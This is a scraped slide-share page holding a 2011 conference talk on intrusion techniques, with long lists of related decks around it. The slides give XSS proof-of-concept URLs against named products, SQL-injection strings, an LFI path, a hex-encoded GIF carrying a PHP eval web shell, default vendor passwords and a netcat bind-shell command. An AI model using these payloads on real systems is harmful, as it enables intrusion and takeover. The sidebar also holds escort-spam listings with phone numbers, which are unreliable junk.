[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
 
Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)Attacking Embedded Devices (No Axe Required)
Attacking Embedded Devices (No Axe Required)
 
Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital Forensics
 
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022The Hacking Games - Operation System Vulnerabilities Meetup 29112022
The Hacking Games - Operation System Vulnerabilities Meetup 29112022
 
The bash vulnerability practical tips to secure your environment
The bash vulnerability practical tips to secure your environmentThe bash vulnerability practical tips to secure your environment
The bash vulnerability practical tips to secure your environment
 
AntiRE en Masse
AntiRE en MasseAntiRE en Masse
AntiRE en Masse
 
Bug Bounty for - Beginners
Bug Bounty for - BeginnersBug Bounty for - Beginners
Bug Bounty for - Beginners
 
Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers Simplest-Ownage-Human-Observed… - Routers
Simplest-Ownage-Human-Observed… - Routers
 

Mais de SegInfo

Plano de captação SegInfo - 10a edição
Plano de captação SegInfo - 10a edição Plano de captação SegInfo - 10a edição
Plano de captação SegInfo - 10a edição SegInfo
 
Analisando eventos de forma inteligente para detecção de intrusos usando ELK
Analisando eventos de forma inteligente para detecção de intrusos usando ELKAnalisando eventos de forma inteligente para detecção de intrusos usando ELK
Analisando eventos de forma inteligente para detecção de intrusos usando ELKSegInfo
 
Midiakit SegInfo 2015
Midiakit SegInfo 2015Midiakit SegInfo 2015
Midiakit SegInfo 2015SegInfo
 
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSBConvite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSBSegInfo
 
Midiakit seginfo v05
Midiakit seginfo v05Midiakit seginfo v05
Midiakit seginfo v05SegInfo
 
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...SegInfo
 
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson BritoSegInfo
 
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de PaulaSegInfo
 
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire..."Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...SegInfo
 
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an..."Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...SegInfo
 
"Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão...
"Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão..."Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão...
"Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão...SegInfo
 
A Miopia do CSO por Jordan Bonagura
A Miopia do CSO por Jordan BonaguraA Miopia do CSO por Jordan Bonagura
A Miopia do CSO por Jordan BonaguraSegInfo
 
"War Games – O que aprender com eles?" por @rafaelsferreira
"War Games – O que aprender com eles?" por @rafaelsferreira "War Games – O que aprender com eles?" por @rafaelsferreira
"War Games – O que aprender com eles?" por @rafaelsferreira SegInfo
 
Proteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
Proteja sua Hovercraft: Mantendo sua nave livre dos SentinelasProteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
Proteja sua Hovercraft: Mantendo sua nave livre dos SentinelasSegInfo
 
"How to track people using social media sites" por Thiago Bordini
"How to track people using social media sites" por Thiago Bordini"How to track people using social media sites" por Thiago Bordini
"How to track people using social media sites" por Thiago BordiniSegInfo
 
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...SegInfo
 
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?SegInfo
 

Mais de SegInfo (17)

Plano de captação SegInfo - 10a edição
Plano de captação SegInfo - 10a edição Plano de captação SegInfo - 10a edição
Plano de captação SegInfo - 10a edição
 
Analisando eventos de forma inteligente para detecção de intrusos usando ELK
Analisando eventos de forma inteligente para detecção de intrusos usando ELKAnalisando eventos de forma inteligente para detecção de intrusos usando ELK
Analisando eventos de forma inteligente para detecção de intrusos usando ELK
 
Midiakit SegInfo 2015
Midiakit SegInfo 2015Midiakit SegInfo 2015
Midiakit SegInfo 2015
 
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSBConvite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
Convite de Patrocinio Workshop Seginfo 2014 - RJ e BSB
 
Midiakit seginfo v05
Midiakit seginfo v05Midiakit seginfo v05
Midiakit seginfo v05
 
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
Segurança Cibernética – Oportunidades e Desafios na Administração Pública Fed...
 
"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito"ENG++: Permutation Oriented Programming" por Nelson Brito
"ENG++: Permutation Oriented Programming" por Nelson Brito
 
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
"A Guerra Cibernética e o novo Hacktivismo" por Anchises M. G. de Paula
 
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire..."Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
"Atacando e Defendendo Aplicações Web" por Rafael Soares Ferreira, Sócio-Dire...
 
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an..."Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
"Automated Malware Analysis" de Gabriel Negreira Barbosa, Malware Research an...
 
"Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão...
"Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão..."Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão...
"Projeto MUFFIN de Resposta a Incidentes – Uma receita para causar indigestão...
 
A Miopia do CSO por Jordan Bonagura
A Miopia do CSO por Jordan BonaguraA Miopia do CSO por Jordan Bonagura
A Miopia do CSO por Jordan Bonagura
 
"War Games – O que aprender com eles?" por @rafaelsferreira
"War Games – O que aprender com eles?" por @rafaelsferreira "War Games – O que aprender com eles?" por @rafaelsferreira
"War Games – O que aprender com eles?" por @rafaelsferreira
 
Proteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
Proteja sua Hovercraft: Mantendo sua nave livre dos SentinelasProteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
Proteja sua Hovercraft: Mantendo sua nave livre dos Sentinelas
 
"How to track people using social media sites" por Thiago Bordini
"How to track people using social media sites" por Thiago Bordini"How to track people using social media sites" por Thiago Bordini
"How to track people using social media sites" por Thiago Bordini
 
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
por Bruno Milreu Filipe "Casos avançados de teste de invasão – Indo além do “...
 
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
"Desafios em Computação Forense e Resposta a Incidentes de Segurança"?
 

Último

Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 

Último (20)

Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 

"Intrusion Techniques (Open Source Tools)" por Ewerson Guimarães por

  • 1. Intrusion Techniques DcLabs Hacking Tour 2011 Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 2. повестка дня отпечатков пальцев Веб-ошибок Задняя дверь грубая сила шеллкод Эксплойты Сканеры Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 3. FingerPrint Grab informations about a target host. Ex: It's used to identify Operational System and/or Services(daemon) version number by TCP/IP response's unique characteristics. The best tool for discovery operating systems, services, devices and others: NMAP (Network Mapper) Basic commands: nmap host (Basic) nmap –sV host (Service Versions) nmap –P0 host ( ICMP ECHO-REPLY Ignore) nmap –O host (Try to grab O.S version) nmap –f host (Firewall/IDS/IPS Evasion) Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 4. Passive - FingerPrint • TTL - When the operating system sets the Time To Live on the outbound packet • Window Size - When the operating system sets the Window Size at. • DF - =The operating system set the Don't Fragment bit. • TOS - The operating system set the Type of Service, and if so, at what. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 6. FingerPrint U. Bourne Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 7. FingerPrint In BackTrack Linux you can find many softwares to Finger-Print Http://www.backtrack-linux.com Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 8. Web Vulnerability These vulnerabilities are initially explored through malicious browser requests compromising the target in a matter of minutes Cross Site (XSS) – Reflected / Stored SQL-Injection PHP (LFI / RFI/ AFU / RCE) Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 9. Web Vulnerability Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. Spekx – Knowledge Base - http://server/pls/ksp_acesso.login_script?p_time=%221%22% 3Cscript%3Ealert%28document.cookie%29;%3C/script%3E LMS Web Ensino – TOTVS http://site/lms/sistema/webensino/index.php? modo=resbusca_biblioteca&pChave=a%22%2F%3E+ %3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E &Submit=Buscar Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 10. Web Vulnerability Reflected / Stored Xss DEMO Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 11. Web Vulnerability Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 12. What is the impact? Why? Examples? Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 13. Web Vulnerability SQL-Injection It occurs when the attacker can insert a series of SQL statements within a 'query' by manipulating the data entry application. SELECT campos FROM tabela WHERE campo = 'test@test.com'; Inject string: some' OR 'x'='x SELECT fields FROM table WHERE field = ‘some' OR 'x'='x'; admin'-- " or 0=0 # ' or 1=1-- hi' or 'a'='a ' or 0=0 -- or 0=0 # " or 1=1-- hi') or ('a'='a " or 0=0 -- ' or 'x'='x or 1=1-- hi") or ("a"="a or 0=0 -- " or "x"="x ' or a=a-- ‘);Drop table x;-- ' or 0=0 # ') or ('x'='x hi" or 1=1 -- ') or ('a'='a Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 14. SQL-Injection LIVE DEMO OCOMON Throwing fudge at the fan Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 15. Web Vulnerability CGI/PHP Command Injection It occurs when the attacker insert a series of commands exploiting vulnerable CGI/PHP scripts OneorZero – AFU + LFI http://server/oneorzero/index.php?controller=../[FILE].php WordPress TimThumb (Theme) Plugin – RCE x47x49x46x38x39x61x01x00x01x00x80x00x00 xFFxFFxFFx00x00x00x21xF9x04x01x00x00x00 x00x2Cx00x00x00x00x01x00x01x00x00x02x02 x44x01x00x3Bx00x3Cx3Fx70x68x70x20x40x65 x76x61x6Cx28x24x5Fx47x45x54x5Bx27x63x6D x64x27x5Dx29x3Bx20x3Fx3Ex00 Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 16. Default/Weak passwords Default passwords are set by its manufacturers/developers and were not changed after the installation/configuration. As supplied by the system vendor and meant to be changed at installation time (Nobody do this shit) Ex: Sw 3Com: User: security - Pass: security FireBird: User: sysdba - Pass: masterkey Weak: Passwords that are easily guessed or in a keyboard sequential Ex: 123456 - Love - House´s phone - Birthday - Etc... Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 17. Brute Force It consists in using random combinations of characters/numbers and symbols, wordlists and/or string generators to crack a password Ex: John the Ripper Hydra SSH Brute Force Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 18. Brute Force DirBuster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 19. Exploits Kinds of Exploits: Local: Usually, the objective of a local exploit is to elevate user's privileges on the machine as close as possible to root (uid=0) or administrator. They are written to exploit kernel bugs or suid binaries Remote: It works over a network connection and exploit the vulnerable target without any prior access to it. www.securityfocus.com www.secunia.com www.exploit-db.com 0Days It works usually an unpublished exploit from a brand new found vulnerability. You can buy! $$$$$ Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 20. Exploits If Kernel was patched? Will we cry? Alexos=> Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 21. Exploits No!!!! Fuck him!!! We have others ways to pwn the box GNU C library dynamic linker Suid´s Etc... Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 22. Backdoors/RootKits Used to maintain access to the system We can Netcat use for this purpose: nc –vv –l –p 5555 nc –vv –l –p 5555 –e /bin/bash nc <ip> <port> RootKits The main purpose of a rootkit is to hide the attacker's presence replacing vital system binaries from target's system Example: Hide files (with match strings) Run command when match strings Hide processes Hide open ports, and others. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 23. Scanners/Fuzzers There are 2 types of scanners: Specific which are written for a specific vulnerability (BSQLHacker, SQLMAP) and Generic which are written for various kinds of vulnerabilities. Generic scanners use known service banners/strings to locate the potential target/vulnerabilities W3af Nessus Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 24. Scanners/Fuzzers Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 25. Scanners/Fuzzers Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 26. Sniffers Sniffer monitors and analyzes network traffic. Some of these packets may contain critical information (such as logins, passwords and cool infos ) WhireShark - Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 27. MetaSploit Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 28. MetaSploit Let´s Fuck Windows? Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 29. Hardening your server HnTool is an open source (GPLv2) hardening tool for Unix. It scans your system for vulnerabilities or problems in configuration files allowing you to get a quick overview of the security status of your system. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 30. Questions? Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 31. Ewerson Guimarães (Crash) DcLabs – HackingTour 2011
  • 32. Contact Crash - crash@dclabs.com.br Irc: irc.freenode.net #dclabs twitter: @crashbrz Ewerson Guimarães (Crash) DcLabs – HackingTour 2011